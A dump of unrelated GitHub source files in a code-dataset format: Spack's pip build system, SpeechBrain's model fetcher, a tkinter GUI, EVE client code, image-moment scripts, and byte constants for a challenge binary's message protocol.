spack.spec.parse_with_version_concrete(item[\"spec\"])\n for item in python_external_config\n if item[\"prefix\"] == self.spec.external_path\n ]\n if python_externals_configured:\n return python_externals_configured[0]\n\n python_externals_detection = spack.detection.by_path(\n [\"python\"], path_hints=[self.spec.external_path]\n )\n\n python_externals_detected = [\n d.spec\n for d in python_externals_detection.get(\"python\", [])\n if d.prefix == self.spec.external_path\n ]\n if python_externals_detected:\n return python_externals_detected[0]\n\n raise StopIteration(\"No external python could be detected for %s to depend on\" % self.spec)\n\n\nclass PythonPackage(PythonExtension):\n \"\"\"Specialized class for packages that are built using pip.\"\"\"\n\n #: Package name, version, and extension on PyPI\n pypi: Optional[str] = None\n\n # To be used in UI queries that require to know which\n # build-system class we are using\n build_system_class = \"PythonPackage\"\n #: Legacy buildsystem attribute used to deserialize and install old specs\n legacy_buildsystem = \"python_pip\"\n\n #: Callback names for install-time test\n install_time_test_callbacks = [\"test\"]\n\n build_system(\"python_pip\")\n\n with spack.multimethod.when(\"build_system=python_pip\"):\n extends(\"python\")\n depends_on(\"py-pip\", type=\"build\")\n # FIXME: technically wheel is only needed when building from source, not when\n # installing a downloaded wheel, but I don't want to add wheel as a dep to every\n # package manually\n depends_on(\"py-wheel\", type=\"build\")\n\n py_namespace: Optional[str] = None\n\n @lang.classproperty\n def homepage(cls):\n if cls.pypi:\n name = cls.pypi.split(\"/\")[0]\n return \"https://pypi.org/project/\" + name + \"/\"\n\n @lang.classproperty\n def url(cls):\n if cls.pypi:\n return \"https://files.pythonhosted.org/packages/source/\" + cls.pypi[0] + \"/\" + cls.pypi\n\n @lang.classproperty\n def list_url(cls):\n if cls.pypi:\n name = cls.pypi.split(\"/\")[0]\n return \"https://pypi.org/simple/\" + name + \"/\"\n\n @property\n def headers(self):\n \"\"\"Discover header files in platlib.\"\"\"\n\n # Remove py- prefix in package name\n name = self.spec.name[3:]\n\n # Headers may be in either location\n include = self.prefix.join(self.spec[\"python\"].package.include).join(name)\n platlib = self.prefix.join(self.spec[\"python\"].package.platlib).join(name)\n headers = fs.find_all_headers(include) + fs.find_all_headers(platlib)\n\n if headers:\n return headers\n\n msg = \"Unable to locate {} headers in {} or {}\"\n raise NoHeadersError(msg.format(self.spec.name, include, platlib))\n\n @property\n def libs(self):\n \"\"\"Discover libraries in platlib.\"\"\"\n\n # Remove py- prefix in package name\n name = self.spec.name[3:]\n\n root = self.prefix.join(self.spec[\"python\"].package.platlib).join(name)\n\n libs = fs.find_all_libraries(root, recursive=True)\n\n if libs:\n return libs\n\n msg = \"Unable to recursively locate {} libraries in {}\"\n raise NoLibrariesError(msg.format(self.spec.name, root))\n\n\ndef fixup_shebangs(path: str, old_interpreter: bytes, new_interpreter: bytes):\n # Recurse into the install prefix and fixup shebangs\n exe = stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH\n dirs = [path]\n hardlinks = set()\n\n while dirs:\n with os.scandir(dirs.pop()) as entries:\n for entry in entries:\n if entry.is_dir(follow_symlinks=False):\n dirs.append(entry.path)\n continue\n\n # Only consider files, not symlinks\n if not entry.is_file(follow_symlinks=False):\n continue\n\n lstat = entry.stat(follow_symlinks=False)\n\n # Skip over files that are not executable\n if not (lstat.st_mode & exe):\n continue\n\n # Don't modify hardlinks more than once\n if lstat.st_nlink > 1:\n key = (lstat.st_ino, lstat.st_dev)\n if key in hardlinks:\n continue\n hardlinks.add(key)\n\n # Finally replace shebangs if any.\n with open(entry.path, \"rb+\") as f:\n contents = f.read(2)\n if contents != b\"#!\":\n continue\n contents += f.read()\n\n if old_interpreter not in contents:\n continue\n\n f.seek(0)\n f.write(contents.replace(old_interpreter, new_interpreter))\n f.truncate()\n\n\n@spack.builder.builder(\"python_pip\")\nclass PythonPipBuilder(BaseBuilder):\n phases = (\"install\",)\n\n #: Names associated with package methods in the old build-system format\n legacy_methods = (\"test\",)\n\n #: Same as legacy_methods, but the signature is different\n legacy_long_methods = (\"install_options\", \"global_options\", \"config_settings\")\n\n #: Names associated with package attributes in the old build-system format\n legacy_attributes = (\"build_directory\", \"install_time_test_callbacks\")\n\n #: Callback names for install-time test\n install_time_test_callbacks = [\"test\"]\n\n @staticmethod\n def std_args(cls):\n return [\n # Verbose\n \"-vvv\",\n # Disable prompting for input\n \"--no-input\",\n # Disable the cache\n \"--no-cache-dir\",\n # Don't check to see if pip is up-to-date\n \"--disable-pip-version-check\",\n # Install packages\n \"install\",\n # Don't install package dependencies\n \"--no-deps\",\n # Overwrite existing packages\n \"--ignore-installed\",\n # Use env vars like PYTHONPATH\n \"--no-build-isolation\",\n # Don't warn that prefix.bin is not in PATH\n \"--no-warn-script-location\",\n # Ignore the PyPI package index\n \"--no-index\",\n ]\n\n @property\n def build_directory(self):\n \"\"\"The root directory of the Python package.\n\n This is usually the directory containing one of the following files:\n\n * ``pyproject.toml``\n * ``setup.cfg``\n * ``setup.py``\n \"\"\"\n return self.pkg.stage.source_path\n\n def config_settings(self, spec, prefix):\n \"\"\"Configuration settings to be passed to the PEP 517 build backend.\n\n Requires pip 22.1 or newer.\n\n Args:\n spec (spack.spec.Spec): build spec\n prefix (spack.util.prefix.Prefix): installation prefix\n\n Returns:\n dict: dictionary of KEY, VALUE settings\n \"\"\"\n return {}\n\n def install_options(self, spec, prefix):\n \"\"\"Extra arguments to be supplied to the setup.py install command.\n\n Requires pip 23.0 or older.\n\n Args:\n spec (spack.spec.Spec): build spec\n prefix (spack.util.prefix.Prefix): installation prefix\n\n Returns:\n list: list of options\n \"\"\"\n return []\n\n def global_options(self, spec, prefix):\n \"\"\"Extra global options to be supplied to the setup.py call before the install\n or bdist_wheel command.\n\n Deprecated in pip 23.1.\n\n Args:\n spec (spack.spec.Spec): build spec\n prefix (spack.util.prefix.Prefix): installation prefix\n\n Returns:\n list: list of options\n \"\"\"\n return []\n\n @property\n def _build_venv_path(self):\n \"\"\"Return the path to the virtual environment used for building when\n python is external.\"\"\"\n return os.path.join(self.spec.package.stage.path, \"build_env\")\n\n @property\n def _build_venv_python(self) -> Executable:\n \"\"\"Return the Python executable in the build virtual environment when\n python is external.\"\"\"\n return Executable(os.path.join(self._build_venv_path, \"bin\", \"python\"))\n\n def install(self, pkg, spec, prefix):\n \"\"\"Install everything from build directory.\"\"\"\n python: Executable = spec[\"python\"].command\n # Since we invoke pip with --no-build-isolation, we have to make sure that pip cannot\n # execute hooks from user and system site-packages.\n if spec[\"python\"].external:\n # There are no environment variables to disable the system site-packages, so we use a\n # virtual environment instead. The downside of this approach is that pip produces\n # incorrect shebangs that refer to the virtual environment, which we have to fix up.\n python(\"-m\", \"venv\", \"--without-pip\", self._build_venv_path)\n pip = self._build_venv_python\n else:\n # For a Spack managed Python, system site-packages is empty/unused by design, so it\n # suffices to disable user site-packages, for which there is an environment variable.\n pip = python\n pip.add_default_env(\"PYTHONNOUSERSITE\", \"1\")\n pip.add_default_arg(\"-m\")\n pip.add_default_arg(\"pip\")\n\n args = PythonPipBuilder.std_args(pkg) + [\"--prefix=\" + prefix]\n\n for key, value in self.config_settings(spec, prefix).items():\n if spec[\"py-pip\"].version < Version(\"22.1\"):\n raise SpecError(\n \"'{}' package uses 'config_settings' which is only supported by \"\n \"pip 22.1+. Add the following line to the package to fix this:\\n\\n\"\n ' depends_on(\"py-pip@22.1:\", type=\"build\")'.format(spec.name)\n )\n\n args.append(\"--config-settings={}={}\".format(key, value))\n\n for option in self.install_options(spec, prefix):\n args.append(\"--install-option=\" + option)\n for option in self.global_options(spec, prefix):\n args.append(\"--global-option=\" + option)\n\n if pkg.stage.archive_file and pkg.stage.archive_file.endswith(\".whl\"):\n args.append(pkg.stage.archive_file)\n else:\n args.append(\".\")\n\n with fs.working_dir(self.build_directory):\n pip(*args)\n\n @spack.builder.run_after(\"install\")\n def fixup_shebangs_pointing_to_build(self):\n \"\"\"When installing a package using an external python, we use a temporary virtual\n environment which improves build isolation. The downside is that pip produces shebangs\n that point to the temporary virtual environment. This method fixes them up to point to the\n underlying Python.\"\"\"\n # No need to fixup shebangs if no build venv was used. (this post install function also\n # runs when install was overridden in another package, so check existence of the venv path)\n if not os.path.exists(self._build_venv_path):\n return\n\n # Use sys.executable, since that's what pip uses.\n interpreter = (\n lambda python: python(\"-c\", \"import sys; print(sys.executable)\", output=str)\n .strip()\n .encode(\"utf-8\")\n )\n\n fixup_shebangs(\n path=self.spec.prefix,\n old_interpreter=interpreter(self._build_venv_python),\n new_interpreter=interpreter(self.spec[\"python\"].command),\n )\n\n spack.builder.run_after(\"install\")(execute_install_time_tests)\n","repo_name":"WAAutoMaton/spack","sub_path":"lib/spack/spack/build_systems/python.py","file_name":"python.py","file_ext":"py","file_size_in_byte":21532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"12038074174","text":"\"\"\"Downloads or otherwise fetches pretrained models\n\nAuthors:\n * Aku Rouhe 2021\n * Samuele Cornell 2021\n * Andreas Nautsch 2022, 2023\n\"\"\"\nimport urllib.request\nimport urllib.error\nimport pathlib\nimport logging\nfrom enum import Enum\nimport huggingface_hub\nfrom typing import Union\nfrom collections import namedtuple\nfrom requests.exceptions import HTTPError\n\nlogger = logging.getLogger(__name__)\n\n\ndef _missing_ok_unlink(path):\n # missing_ok=True was added to Path.unlink() in Python 3.8\n # This does the same.\n try:\n path.unlink()\n except FileNotFoundError:\n pass\n\n\nclass FetchFrom(Enum):\n \"\"\"Designator where to fetch models/audios from.\n\n Note: HuggingFace repository sources and local folder sources may be confused if their source type is undefined.\n \"\"\"\n\n LOCAL = 1\n HUGGING_FACE = 2\n URI = 3\n\n\n# For easier use\nFetchSource = namedtuple(\"FetchSource\", [\"FetchFrom\", \"path\"])\nFetchSource.__doc__ = (\n \"\"\"NamedTuple describing a source path and how to fetch it\"\"\"\n)\nFetchSource.__hash__ = lambda self: hash(self.path)\nFetchSource.encode = lambda self, *args, **kwargs: \"_\".join(\n (str(self.path), str(self.FetchFrom))\n).encode(*args, **kwargs)\n# FetchSource.__str__ = lambda self: str(self.path)\n\n\ndef fetch(\n filename,\n source,\n savedir=\"./pretrained_model_checkpoints\",\n overwrite=False,\n save_filename=None,\n use_auth_token=False,\n revision=None,\n cache_dir: Union[str, pathlib.Path, None] = None,\n silent_local_fetch: bool = False,\n):\n \"\"\"Ensures you have a local copy of the file, returns its path\n\n In case the source is an external location, downloads the file. In case\n the source is already accessible on the filesystem, creates a symlink in\n the savedir. Thus, the side effects of this function always look similar:\n savedir/save_filename can be used to access the file. And save_filename\n defaults to the filename arg.\n\n Arguments\n ---------\n filename : str\n Name of the file including extensions.\n source : str or FetchSource\n Where to look for the file. This is interpreted in special ways:\n First, if the source begins with \"http://\" or \"https://\", it is\n interpreted as a web address and the file is downloaded.\n Second, if the source is a valid directory path, a symlink is\n created to the file.\n Otherwise, the source is interpreted as a Huggingface model hub ID, and\n the file is downloaded from there.\n savedir : str\n Path where to save downloads/symlinks.\n overwrite : bool\n If True, always overwrite existing savedir/filename file and download\n or recreate the link. If False (as by default), if savedir/filename\n exists, assume it is correct and don't download/relink. Note that\n Huggingface local cache is always used - with overwrite=True we just\n relink from the local cache.\n save_filename : str\n The filename to use for saving this file. Defaults to filename if not\n given.\n use_auth_token : bool (default: False)\n If true Hugginface's auth_token will be used to load private models from the HuggingFace Hub,\n default is False because majority of models are public.\n revision : str\n The model revision corresponding to the HuggingFace Hub model revision.\n This is particularly useful if you wish to pin your code to a particular\n version of a model hosted at HuggingFace.\n cache_dir: str or Path (default: None)\n Location of HuggingFace cache for storing pre-trained models, to which symlinks are created.\n silent_local_fetch: bool (default: False)\n Surpress logging messages (quiet mode).\n\n Returns\n -------\n pathlib.Path\n Path to file on local file system.\n\n Raises\n ------\n ValueError\n If file is not found\n \"\"\"\n if save_filename is None:\n save_filename = filename\n savedir = pathlib.Path(savedir)\n savedir.mkdir(parents=True, exist_ok=True)\n fetch_from = None\n if isinstance(source, FetchSource):\n fetch_from, source = source\n sourcefile = f\"{source}/{filename}\"\n destination = savedir / save_filename\n if destination.exists() and not overwrite:\n MSG = f\"Fetch {filename}: Using existing file/symlink in {str(destination)}.\"\n logger.info(MSG)\n return destination\n\n if pathlib.Path(source).is_dir() and fetch_from not in [\n FetchFrom.HUGGING_FACE,\n FetchFrom.URI,\n ]:\n # Interpret source as local directory path & create a link and return it as destination\n sourcepath = pathlib.Path(sourcefile).absolute()\n _missing_ok_unlink(destination)\n destination.symlink_to(sourcepath)\n MSG = f\"Destination {filename}: local file in {str(sourcepath)}.\"\n if not silent_local_fetch:\n logger.info(MSG)\n return destination\n if (\n str(source).startswith(\"http:\") or str(source).startswith(\"https:\")\n ) or fetch_from is FetchFrom.URI:\n # Interpret source as web address.\n MSG = (\n f\"Fetch {filename}: Downloading from normal URL {str(sourcefile)}.\"\n )\n logger.info(MSG)\n # Download\n try:\n urllib.request.urlretrieve(sourcefile, destination)\n except urllib.error.URLError:\n raise ValueError(\n f\"Interpreted {source} as web address, but could not download.\"\n )\n else: # FetchFrom.HUGGING_FACE check is spared (no other option right now)\n # Interpret source as huggingface hub ID\n # Use huggingface hub's fancy cached download.\n MSG = f\"Fetch {filename}: Delegating to Huggingface hub, source {str(source)}.\"\n logger.info(MSG)\n try:\n fetched_file = huggingface_hub.hf_hub_download(\n repo_id=source,\n filename=filename,\n use_auth_token=use_auth_token,\n revision=revision,\n cache_dir=cache_dir,\n )\n logger.info(f\"HF fetch: {fetched_file}\")\n except HTTPError as e:\n if \"404 Client Error\" in str(e):\n raise ValueError(\"File not found on HF hub\")\n else:\n raise\n\n # Huggingface hub downloads to etag filename, symlink to the expected one:\n sourcepath = pathlib.Path(fetched_file).absolute()\n _missing_ok_unlink(destination)\n destination.symlink_to(sourcepath)\n return destination\n","repo_name":"speechbrain/speechbrain","sub_path":"speechbrain/pretrained/fetching.py","file_name":"fetching.py","file_ext":"py","file_size_in_byte":6510,"program_lang":"python","lang":"en","doc_type":"code","stars":6855,"dataset":"github-code","pt":"52"} +{"seq_id":"9612310099","text":"#!/usr/bin/env python3\n# -*- coding: UTF-8 -*-\n#import sys\n#input=sys.stdin.readline\n\ns=input()\nx=len(s)\nans=[0]*x\nchk=[0,0]\nf=0\nfor i in range(x):\n if s[i]==\"R\":\n chk[i%2]+=1\n if s[i]==\"L\":\n if i%2:\n ans[i-1]+=chk[0]\n ans[i]+=chk[1]\n else:\n ans[i]+=chk[0]\n ans[i-1]+=chk[1]\n\n chk=[0,0]\nchk=[0,0]\nfor i in range(x-1,-1,-1):\n if s[i]==\"L\":\n chk[i%2]+=1\n if s[i]==\"R\":\n if i%2:\n ans[i+1]+=chk[0]\n ans[i]+=chk[1]\n else:\n ans[i]+=chk[0]\n ans[i+1]+=chk[1]\n chk=[0,0]\n \nprint(*ans)\n","repo_name":"clarinet758/atcoder","sub_path":"abc/b126_150/b136/d1.py","file_name":"d1.py","file_ext":"py","file_size_in_byte":635,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"33151095920","text":"import os\nimport logging\nimport logging.config\n\ncfg = {\n \"version\": 1,\n \"formatters\": {\n \"formatter\": {\n \"format\": \"%(asctime)s - %(ms)s \\ %(method)s: %(message)s\"\n }\n },\n \"handlers\": {\n \"handler\": {\n \"class\": \"logging.FileHandler\",\n \"formatter\": \"formatter\",\n \"filename\":\n os.path.abspath(\n os.path.join(\n os.path.join(\n os.path.join(\n os.path.dirname(__file__), \"..\"), \"logs\"), \"app.log\")),\n \"mode\": \"a\"\n }\n },\n \"loggers\": {\n \"logger\": {\n \"handlers\": [\"handler\"],\n \"level\": \"DEBUG\"\n }\n }\n}\n\nlogging.config.dictConfig(cfg)\nlogger = logging.getLogger(\"logger\")\n","repo_name":"sys321/python_bootcamp_hw_22_2","sub_path":"common/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"18378363734","text":"import tkinter as tk\nfrom tkinter import messagebox\nfrom tkinter import filedialog\n\nimport random\n\nfrom source.components.menu import Menu\nfrom source.components.canvas import Canvas\nfrom source.components.tools import *\n\n# Window parameters\nWIDTH = 1000\nHEIGHT = 600\nSCALE = 1.5\n\n# Adobe flat UI colour scheme\nDARK_BLUE = \"#2C3E50\"\nMEDIUM_BLUE = \"#2980B9\"\nLIGHT_BLUE = \"#3498DB\"\nRED = \"#E74C3C\"\nWHITE = \"#ECF0F1\"\n\n# Colour parameters\nCANVAS_BACKGROUND = WHITE\n\n# Dimensions\nFRAME_OPTIONS = {\"padx\":10}\n\nclass View(tk.Tk):\n \"\"\"This class implements the \"view\" part of the MVC architectural pattern.\"\"\"\n\n def __init__(self, *args, **kwargs):\n super(View, self).__init__(*args, **kwargs)\n self.title(\"Probabilistic ray model of energy propagation\")\n\n self.menu = Menu(self)\n self.config(menu=self.menu)\n\n self.canvas = Canvas(self, height=100, width=WIDTH, bg=CANVAS_BACKGROUND)\n self.canvas.pack(fill=tk.BOTH, expand=tk.YES)\n\n self.toolbar = CreationTools(self, **FRAME_OPTIONS)\n self.toolbar.pack(fill=tk.BOTH, expand=tk.NO)\n\n self.minsize(width=WIDTH, height=HEIGHT)\n\n self.controller = None\n\n def register(self, controller):\n \"\"\"\n This method registers the controller to send requests to.\n \"\"\"\n self.controller = controller\n\n def switch_tools(self, tools):\n \"\"\"\n This method switches toolbar to requested tools.\n \"\"\"\n self.toolbar.pack_forget()\n self.toolbar.destroy()\n self.remove_binds()\n if tools == \"CreationTools\":\n self.toolbar = CreationTools(self, **FRAME_OPTIONS)\n elif tools == \"MovingTools\":\n self.toolbar = MovingTools(self, **FRAME_OPTIONS)\n self.add_bind(tools)\n elif tools == \"DeletingTools\":\n self.toolbar = DeletingTools(self, **FRAME_OPTIONS)\n self.add_bind(tools)\n elif tools == \"ModifyingTools\":\n self.toolbar = ModifyingTools(self, **FRAME_OPTIONS)\n elif tools == \"CustomisingTools\":\n self.toolbar = CustomisingTools(self, **FRAME_OPTIONS)\n self.add_bind(tools)\n elif tools == \"ModelTools\":\n self.toolbar = ModelTools(self, **FRAME_OPTIONS)\n else:\n raise ValueError(\"No such tools.\")\n self.toolbar.pack(fill=tk.BOTH, expand=tk.NO)\n\n def refresh_canvas(self, adjacency, positions, modified, selected=False):\n \"\"\"\n This method refreshes canvas based on the received data.\n \"\"\"\n self.canvas.refresh_canvas(adjacency, positions, modified, selected)\n\n def remove_binds(self):\n \"\"\"\n This method removes all binds from the canvas.\n \"\"\"\n self.canvas.remove_binds()\n\n def add_bind(self, tools):\n \"\"\"\n This method adds requested bind to canvas.\n \"\"\"\n if tools == \"MovingTools\":\n self.canvas.add_moving_bind()\n elif tools == \"DeletingTools\":\n self.canvas.add_deleting_bind()\n elif tools == \"CustomisingTools\":\n self.canvas.add_selecting_bind()\n else:\n raise ValueError(\"No such tools.\")\n\n def show_message(self, title, message):\n \"\"\"\n This method displays the message box with requested title and a message.\n \"\"\"\n messagebox.showinfo(title, message)\n\n def save_as(self, extension):\n \"\"\"\n This method displays the file dialog box to save file and returns the\n file name.\n \"\"\"\n filename = filedialog.asksaveasfile(mode='w', defaultextension=extension)\n if filename is None:\n return None\n return filename.name\n\n def open(self):\n \"\"\"\n This method displays the file dialog box to open file and returns the\n file name.\n \"\"\"\n filename = filedialog.askopenfilename()\n if filename == '':\n return None\n return filename\n\n def resize_window(self, option):\n \"\"\"\n This method sets new minimal size of the window.\n \"\"\"\n if option == \"small\":\n self.minsize(width=int(WIDTH/SCALE), height=int(HEIGHT/SCALE))\n elif option == \"medium\":\n self.minsize(width=int(WIDTH), height=int(HEIGHT))\n elif option == \"large\":\n self.minsize(width=int(WIDTH*SCALE), height=int(HEIGHT*SCALE))\n\n\n def change_background(self):\n \"\"\"\n This method changes background colour to some random value.\n \"\"\"\n red = hex(random.randint(150, 255))[2:]\n green = hex(random.randint(150, 255))[2:]\n blue = hex(random.randint(150, 255))[2:]\n self.canvas.configure(bg=\"#{0}{1}{2}\".format(red, green, blue))\n","repo_name":"janzmazek/wave-propagation","sub_path":"source/view.py","file_name":"view.py","file_ext":"py","file_size_in_byte":4727,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"42092827988","text":"# magic number constants from malicious make binary\nMAGIC_START = b\"\\x14\\x42\\x40\\x73\"\nMAGIC_END = b\"\\xe6\\x4f\\x14\\x95\"\n\nCMD_LENGTH = b\"\\x00\\x02\"\nUUID_LENGTH = b\"\\x00\\x10\"\n\nPARAM_CMD = b\"\\x4e\\x00\"\nPARAM_UUID = b\"\\x4e\\x08\"\nPARAM_DIRNAME = b\"\\x4e\\x14\"\nPARAM_FILENAME = b\"\\x4e\\x1c\"\nPARAM_CONTENTS = b\"\\x4e\\x20\"\nPARAM_MORE = b\"\\x4e\\x24\"\nPARAM_CODE = b\"\\x4e\\x28\"\nPARAM_TASKNAME = b\"\\x4e\\x18\"\n\nCOMMAND_INIT = b\"\\x00\\x02\"\nCOMMAND_REQUEST = b\"\\x00\\x03\"\nCOMMAND_LS = b\"\\x00\\x04\"\nCOMMAND_CAT = b\"\\x00\\x05\"\nCOMMAND_UPLOAD = b\"\\x00\\x06\"\nCOMMAND_FIN = b\"\\x00\\x07\"\n","repo_name":"hakkilab/NSACC2021","sub_path":"Task09/magic_constants.py","file_name":"magic_constants.py","file_ext":"py","file_size_in_byte":549,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"37020499431","text":"#Embedded file name: e:\\jenkins\\workspace\\client_SERENITY\\branches\\release\\SERENITY\\eve\\client\\script\\ui\\view\\stationView.py\r\nimport sys\r\nfrom eveSpaceObject import spaceobjaudio\r\nimport evetypes\r\nimport inventorycommon.typeHelpers\r\nfrom inventorycommon.util import IsShipFittingFlag\r\nfrom eve.common.script.net import eveMoniker\r\nimport log\r\nimport trinity\r\nimport util\r\nimport uthread\r\nimport blue\r\nfrom eve.client.script.ui.services.viewStateSvc import View\r\nfrom eve.client.script.ui.inflight import shipstance\r\nfrom eveSpaceObject import spaceobjanimation\r\nimport evegraphics.utils as gfxutils\r\n\r\nclass StationView(View):\r\n __guid__ = 'viewstate.StationView'\r\n __notifyevents__ = ['OnDogmaItemChange',\r\n 'ProcessActiveShipChanged',\r\n 'OnActiveShipSkinChange',\r\n 'OnDamageStateChanged']\r\n __dependencies__ = ['godma',\r\n 'loading',\r\n 'station',\r\n 'invCache',\r\n 't3ShipSvc',\r\n 'sceneManager',\r\n 'clientDogmaIM']\r\n __overlays__ = {'sidePanels'}\r\n\r\n def __init__(self):\r\n View.__init__(self)\r\n self.activeshipmodel = None\r\n\r\n def ShowShip(self, shipID, maintainZoomLevel = False):\r\n self.WaitForShip(shipID)\r\n hangarInv = self.invCache.GetInventory(const.containerHangar)\r\n hangarItems = hangarInv.List()\r\n for each in hangarItems:\r\n if each.itemID == shipID:\r\n self.activeShipItem = each\r\n try:\r\n uthread.new(self.ShowActiveShip, maintainZoomLevel)\r\n except Exception as e:\r\n log.LogException('Failed to show ship')\r\n sys.exc_clear()\r\n\r\n break\r\n\r\n def HideView(self):\r\n interiorScene = sm.GetService('sceneManager').GetActiveScene()\r\n if interiorScene:\r\n for cs in interiorScene.curveSets:\r\n for binding in cs.bindings:\r\n binding.copyValueCallable = None\r\n\r\n del cs.bindings[:]\r\n del cs.curves[:]\r\n\r\n View.HideView(self)\r\n\r\n def WaitForShip(self, shipID):\r\n maximumWait = 10000\r\n sleepUnit = 100\r\n iterations = maximumWait / sleepUnit\r\n while util.GetActiveShip() != shipID and iterations:\r\n iterations -= 1\r\n blue.pyos.synchro.SleepWallclock(sleepUnit)\r\n\r\n if util.GetActiveShip() != shipID:\r\n raise RuntimeError('Ship never came :(')\r\n self.LogInfo('Waited for ship for %d iterations.' % (maximumWait / sleepUnit - iterations))\r\n\r\n def SetupAnimation(self, model, shipItem):\r\n if model is None:\r\n return\r\n if not evetypes.Exists(shipItem.typeID):\r\n return\r\n animationStates = inventorycommon.typeHelpers.GetAnimationStates(shipItem.typeID)\r\n spaceobjanimation.LoadAnimationStates(animationStates, cfg.graphicStates, model, trinity)\r\n if model.animationSequencer is not None:\r\n model.animationSequencer.GoToState('normal')\r\n spaceobjanimation.SetShipAnimationStance(model, shipstance.get_ship_stance(shipItem.itemID, shipItem.typeID))\r\n\r\n def OnDogmaItemChange(self, item, change):\r\n if item.locationID == change.get(const.ixLocationID, None) and item.flagID == change.get(const.ixFlag):\r\n return\r\n activeShipID = util.GetActiveShip()\r\n if item.locationID == activeShipID and IsShipFittingFlag(item.flagID) and item.categoryID == const.categorySubSystem:\r\n self.ShowShip(activeShipID)\r\n\r\n def OnActiveShipSkinChange(self, itemID, skinID):\r\n if session.stationid2 is None:\r\n return\r\n if not hasattr(self, 'activeShipItem'):\r\n return\r\n if itemID == self.activeShipItem.itemID:\r\n self.ShowShip(self.activeShipItem.itemID, maintainZoomLevel=True)\r\n\r\n def OnDamageStateChanged(self, itemID):\r\n if self.activeShipItem.itemID == itemID:\r\n shieldState, armorState, hullState = self.GetDamageState(self.activeShipItem.itemID)\r\n self.activeshipmodel.SetImpactDamageState(shieldState, armorState, hullState, False)\r\n\r\n def ProcessActiveShipChanged(self, shipID, oldShipID):\r\n if oldShipID != shipID:\r\n self.ShowShip(shipID)\r\n\r\n def SetupAnimationUpdaterAudio(self, newModel):\r\n if hasattr(newModel, 'animationUpdater'):\r\n newModel.animationUpdater.eventListener = self.generalAudioEntity\r\n\r\n def GetDamageState(self, itemID):\r\n shieldState, armorState, hullState = sm.GetService('clientDogmaIM').GetDogmaLocation().GetDamageStateEx(itemID)\r\n if isinstance(shieldState, tuple):\r\n shieldState = shieldState[0]\r\n return (shieldState, armorState, hullState)\r\n\r\n def SetupShipModel(self, newModel):\r\n itemID = self.activeShipItem.itemID\r\n dirtTimeStamp = eveMoniker.GetShipAccess().GetDirtTimestamp(itemID)\r\n dirtLevel = gfxutils.CalcDirtLevelFromAge(dirtTimeStamp)\r\n newModel.dirtLevel = dirtLevel\r\n killCounter = sm.RemoteSvc('shipKillCounter').GetItemKillCountPlayer(itemID)\r\n newModel.displayKillCounterValue = min(killCounter, 999)\r\n shieldState, armorState, hullState = self.GetDamageState(itemID)\r\n newModel.SetImpactDamageState(shieldState, armorState, hullState, True)\r\n\r\n def SetupGeneralAudioEntity(self, newModel):\r\n if newModel is not None and hasattr(newModel, 'observers'):\r\n self.generalAudioEntity = spaceobjaudio.SetupAudioEntity(newModel)\r\n","repo_name":"connoryang/dec-eve-serenity","sub_path":"client/eve/client/script/ui/view/stationView.py","file_name":"stationView.py","file_ext":"py","file_size_in_byte":5520,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"38973512145","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Nov 24 13:21:36 2019\n\n@author: Carter\n\"\"\"\n\nimport numpy as np\n\n#try switching x and y\n\ndef moment(im,i,j):\n moment = 0\n x,y = im.shape\n for k in range(x):\n for l in range(y):\n moment = moment + k**i*l**j*im[k,l]\n return moment\n\ndef cen_mom(im,x_bar,y_bar,p,q):\n moment = 0\n x,y = im.shape\n for k in range(x):\n for l in range(y):\n moment = moment + (k-x_bar)**p*(l-y_bar)**q*im[k,l]\n return moment\n \n \ndef huMoments(H):\n #make sure H is normalized\n large = np.max(H) \n H = H/large\n print(H.shape)\n \n #caluculate X_bar and Y_bar\n m00 = moment(H,0,0)\n m10 = moment(H,1,0)\n m01 = moment(H,0,1)\n \n x_bar = m10/m00\n y_bar = m01/m00\n \n #get central moments\n cm20 = cen_mom(H,x_bar,y_bar,2,0)\n cm02 = cen_mom(H,x_bar,y_bar,0,2)\n cm11 = cen_mom(H,x_bar,y_bar,1,1)\n cm30 = cen_mom(H,x_bar,y_bar,3,0)\n cm03 = cen_mom(H,x_bar,y_bar,0,3)\n cm12 = cen_mom(H,x_bar,y_bar,1,2)\n cm21 = cen_mom(H,x_bar,y_bar,2,1)\n \n #calculate Hu Moments\n h1 = cm20 + cm02\n h2 = (cm20 - cm02)**2 + 4*cm11**2\n h3 = (cm30- 3*cm12)**2 + (3*cm21-cm03)**2\n h4 = (cm30 + cm12)**2 + (cm21+cm03)**2\n h5 = (cm30 - 3*cm12)*(cm30+cm12)*((cm30+cm12)**2 -3*(cm21+cm03)**2) + (3*cm21 - cm03)*(cm21 + cm03)*(3*(cm30+cm12)**2 - (cm21 + cm03)**2)\n h6 = (cm20 - cm02)*((cm30+ cm12)**2 -(cm21 + cm03)**2) + 4*cm11*(cm30+cm12)*(cm21 + cm03)\n h7 = (3*cm21 - cm03)*(cm30+cm12)*((cm30 +cm12)**2 - 3*(cm21 + cm03)**2) - (cm30 - 3*cm12)*(cm21 + cm03)*(3*(cm30 + cm12)**2 - (cm21 +cm03)**2)\n \n \n return [h1,h2,h3,h4,h5,h6,h7]\n\n\n#main code\nMHIs = np.load('allMHI_2.npy')\n\nhuVectors = []\nfor i in range(len(MHIs)):\n im1 = MHIs[i,:,:]\n moments = huMoments(im1)\n huVectors.append(moments)\n\n\nhuVectors = np.asarray(huVectors)\nnp.save('huVectors_3.npy',huVectors)","repo_name":"carterprice2/Computer_Vision","sub_path":"PS5/Price_Leon_Carter_PS5_py/huMoments.py","file_name":"huMoments.py","file_ext":"py","file_size_in_byte":1913,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"10445109978","text":"from datetime import datetime\n\nfrom django_filters import rest_framework as filters\nfrom rest_framework import viewsets, status\nfrom rest_framework.response import Response\nfrom drf_yasg2.utils import 